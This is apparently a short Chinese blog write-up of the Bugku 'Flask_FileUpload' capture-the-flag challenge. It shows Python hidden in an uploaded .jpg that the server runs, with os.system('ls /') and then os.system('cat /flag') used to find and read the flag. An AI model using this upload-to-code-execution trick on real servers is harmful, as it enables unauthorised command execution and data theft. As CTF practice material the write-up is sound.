技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
devlei
3 小时前
从源码泄露看AI Agent未来:深度对比Claude Code原生实现与OpenClaw开源方案
android·前端·后端
Jagger_
4 小时前
周末和AI肝了两天,终于知道:为什么要把AI当做实习生
前端
weixin_45616483
4 小时前
vue3 子组件向父组件传参
前端·vue.js
Mr_Xuhhh
4 小时前
Java泛型进阶:从基础到高级特性完全指南
开发语言·windows·python
沉鱼.44
4 小时前
第十二届题目
java·前端·算法
Setsuna_F_Seiei
4 小时前
CocosCreator 游戏开发 - 多维度状态机架构设计与实现
前端·cocos creator·游戏开发
Bigger
4 小时前
CodeWalkers:让 AI 助手化身桌面宠物,陪你敲代码的赛博伙伴!
前端·app·ai编程
老天文学家了
4 小时前
蓝桥杯备战Python
开发语言·python
ID_18007905473
5 小时前
除了 Python,还有哪些语言可以解析 JSON 数据?
开发语言·python·json
cyclv
6 小时前
无网络地图展示轨迹,地图瓦片下载,绘制管线
前端·javascript
热门推荐
01GitHub 镜像站点02OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程03AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南04Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06【Vulhub】Fastjson 1.2.24_rce复现07Claude Code 未登录 使用第三方模型08UV安装并设置国内源09Oh My Codex 快速使用指南10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)